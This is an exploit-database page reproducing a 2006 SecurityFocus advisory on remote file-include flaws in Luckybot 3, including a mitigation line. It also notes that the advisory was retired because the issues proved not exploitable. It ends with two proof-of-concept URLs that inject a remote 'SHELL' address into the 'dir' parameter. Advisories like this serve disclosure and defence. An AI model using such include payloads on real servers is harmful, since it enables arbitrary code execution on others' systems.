header-logo
Suggest Exploit
vendor:
Luckybot
by:
SecurityFocus
N/A
CVSS
N/A
Remote File-Include Vulnerabilities
98
CWE
Product Name: Luckybot
Affected Version From: 3
Affected Version To: 3
Patch Exists: NO
Related CWE: None
CPE: None
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

Multiple Remote File-Include Vulnerabilities in Luckybot

Multiple remote file-include vulnerabilities affect Luckybot because the application fails to properly sanitize user-supplied input before using it in a PHP 'include()' function call. An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized before being used in a PHP 'include()' function call.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/21765/info

Multiple remote file-include vulnerabilities affect Luckybot because the application fails to properly sanitize user-supplied input before using it in a PHP 'include()' function call. 

An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. 

Version 3 is vulnerable to this issue; other versions may also be affected.

NOTE: This BID is being retired because further analysis reveals that these issues are not exploitable.

http://www.example.com/run.php?dir=SHELL?&file=
http://www.example.com/classes/ircbot.class.php?dir=SHELL?&file=
cqrsecured